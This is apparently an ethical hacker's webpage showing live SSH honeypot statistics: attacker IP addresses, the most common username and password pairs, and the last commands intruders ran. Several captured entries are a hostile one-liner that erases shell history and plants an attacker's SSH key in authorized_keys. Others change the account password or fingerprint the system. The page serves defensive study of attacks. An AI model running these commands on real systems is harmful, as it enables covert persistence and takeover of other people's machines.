ENG ITA

# Ethical Hacker & ICT Security Specialist

Honey pot (Honeypot)

A honey pot is a computer system on the Internet that is expressly set up to attract and "trap" malicious traffic and people who attempt to penetrate other people's computer systems.

Essentially it's a software or hardware component used as decoy, in order to be able to study attacks in real time.

Look at my honeypot stats:

Live Dictionaries

You can download dictionaries of passwords, usernames and pass+users collected from SSH attacks:

General honeypot stats below:

SSH

×
Last 50 commands executed
DateCommandSource
2019-07-24 07:02:51uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd104.248.255.118 United States
2019-07-24 06:19:45uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd74.63.232.2 United States
2019-07-24 06:17:35uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd152.115.50.82 Denmark
2019-07-24 03:58:16uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd109.110.52.77 Russian Federation
2019-07-24 03:55:43lscpu | grep Model59.13.139.46 Korea, Republic of
2019-07-24 03:55:37uname -a59.13.139.46 Korea, Republic of
2019-07-24 03:55:31uname59.13.139.46 Korea, Republic of
2019-07-24 03:55:25top59.13.139.46 Korea, Republic of
2019-07-24 03:55:20nproc59.13.139.46 Korea, Republic of
2019-07-24 03:55:20nproc59.13.139.46 Korea, Republic of
2019-07-24 03:55:14uname -m59.13.139.46 Korea, Republic of
2019-07-24 03:55:09w59.13.139.46 Korea, Republic of
2019-07-24 03:55:00crontab -l59.13.139.46 Korea, Republic of
2019-07-24 03:54:55ls -lh $(which ls)59.13.139.46 Korea, Republic of
2019-07-24 03:54:55which ls59.13.139.46 Korea, Republic of
2019-07-24 03:54:49free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'59.13.139.46 Korea, Republic of
2019-07-24 03:54:49free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7}59.13.139.46 Korea, Republic of
2019-07-24 03:54:41cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'59.13.139.46 Korea, Republic of
2019-07-24 03:54:41cat /proc/cpuinfo | grep name | head -n 1 | awk {print $4,$5,$6,$7,$8,$9;}59.13.139.46 Korea, Republic of
2019-07-24 03:54:36echo -e "pass1234\\nW#hW3lsGAWJM\\nW#hW3lsGAWJM"|passwd|bash59.13.139.46 Korea, Republic of
2019-07-24 03:54:36Enter new UNIX password: 59.13.139.46 Korea, Republic of
2019-07-24 03:54:30cat /proc/cpuinfo | grep name | wc -l59.13.139.46 Korea, Republic of
2019-07-24 03:40:57lscpu | grep Model92.141.137.152 France
2019-07-24 03:40:52uname -a92.141.137.152 France
2019-07-24 03:40:47uname92.141.137.152 France
2019-07-24 03:40:42top92.141.137.152 France
2019-07-24 03:40:30nproc92.141.137.152 France
2019-07-24 03:40:30nproc92.141.137.152 France
2019-07-24 03:40:25uname -m92.141.137.152 France
2019-07-24 03:40:20w92.141.137.152 France
2019-07-24 03:40:15crontab -l92.141.137.152 France
2019-07-24 03:40:07ls -lh $(which ls)92.141.137.152 France
2019-07-24 03:40:07which ls92.141.137.152 France
2019-07-24 03:40:02free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'92.141.137.152 France
2019-07-24 03:40:02free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7}92.141.137.152 France
2019-07-24 03:39:57cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'92.141.137.152 France
2019-07-24 03:39:57cat /proc/cpuinfo | grep name | head -n 1 | awk {print $4,$5,$6,$7,$8,$9;}92.141.137.152 France
2019-07-24 03:39:52echo -e "asd\\no-viNJH4J8bD\\no-viNJH4J8bD"|passwd|bash92.141.137.152 France
2019-07-24 03:39:52Enter new UNIX password: 92.141.137.152 France
2019-07-24 03:39:47cat /proc/cpuinfo | grep name | wc -l92.141.137.152 France
2019-07-24 02:48:10uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd165.227.124.229 United States
2019-07-24 02:25:45uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd206.189.94.158 United States
2019-07-24 02:22:44uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd51.91.36.96 France
2019-07-24 02:06:13uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd180.76.97.86 China
2019-07-24 02:01:50uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd36.66.149.211 Indonesia
2019-07-24 01:50:33lscpu | grep Model138.68.140.76 United Kingdom
2019-07-24 01:50:29uname -a138.68.140.76 United Kingdom
2019-07-24 01:50:23uname138.68.140.76 United Kingdom
2019-07-24 01:50:18top138.68.140.76 United Kingdom
2019-07-24 01:50:13cat /proc/cpuinfo | grep model | grep name | wc -l138.68.140.76 United Kingdom
×
Last 20 sessions
DateSource
2019-07-24 09:15:43134.19.187.75 Netherlands
2019-07-24 09:15:405.188.86.206 Ireland
2019-07-24 09:15:385.188.87.52 Russian Federation
2019-07-24 09:15:25134.19.187.75 Netherlands
2019-07-24 09:15:205.188.86.207 Ireland
2019-07-24 09:15:145.188.86.164 Ireland
2019-07-24 09:15:095.188.86.167 Ireland
2019-07-24 09:14:595.188.87.55 Russian Federation
2019-07-24 09:14:485.188.86.196 Ireland
2019-07-24 09:14:435.188.87.49 Russian Federation
2019-07-24 09:14:365.188.86.169 Ireland
2019-07-24 09:14:345.188.86.211 Ireland
2019-07-24 09:14:295.188.86.207 Ireland
2019-07-24 09:14:05134.19.187.75 Netherlands
2019-07-24 09:14:035.188.86.167 Ireland
2019-07-24 09:14:015.188.87.52 Russian Federation
2019-07-24 09:13:55185.220.221.208 Czech Republic
2019-07-24 09:13:495.188.86.164 Ireland
2019-07-24 09:13:485.188.86.206 Ireland
2019-07-24 09:13:425.188.87.55 Russian Federation
×
TOP 15 USER+PASS
CountUsernamePassword
1873829 adminadmin123
13790 rootchangeme
5320 admin
3262 adminaerohive
1323 ubntubnt
1304 adminadmin
1202 111111admin
1200 adm12345678
645 12341234
622 adamadam
619 aa
617 admadm
616 accacc
615 adm123456
610 3comcsoRIP000
×
TOP 20 SUCCESSFUL LOGIN IPs
CountSource
797965.188.86.211 Ireland
594845.188.87.55 Russian Federation
5813588.214.26.88
578775.188.87.51 Russian Federation
573345.188.87.49 Russian Federation
567765.188.87.53 Russian Federation
5627288.214.26.89
556735.188.87.52 Russian Federation
550815.188.86.194 Ireland
550545.188.87.54 Russian Federation
538275.188.86.169 Ireland
534465.188.86.165 Ireland
526875.188.86.208 Ireland
525735.188.86.167 Ireland
52466134.19.187.75 Netherlands
524425.188.86.210 Ireland
520505.188.86.197 Ireland
512135.188.86.170 Ireland
50666185.220.221.203 Czech Republic
506245.188.86.195 Ireland
×
TOP 20 attackers
ConnectionsSource
798545.188.86.211 Ireland
595185.188.87.55 Russian Federation
5906188.214.26.88
578905.188.87.51 Russian Federation
573495.188.87.49 Russian Federation
5716288.214.26.89
567865.188.87.53 Russian Federation
557155.188.87.52 Russian Federation
551235.188.86.194 Ireland
550825.188.87.54 Russian Federation
538855.188.86.169 Ireland
535295.188.86.165 Ireland
527535.188.86.208 Ireland
526255.188.86.167 Ireland
52545134.19.187.75 Netherlands
525185.188.86.210 Ireland
521045.188.86.197 Ireland
512625.188.86.170 Ireland
50692185.220.221.203 Czech Republic
506715.188.86.195 Ireland

If you want to take a look to the source code of this page, go to my project HoneyStats! (github)

Want to know more? Check out my Security LAB!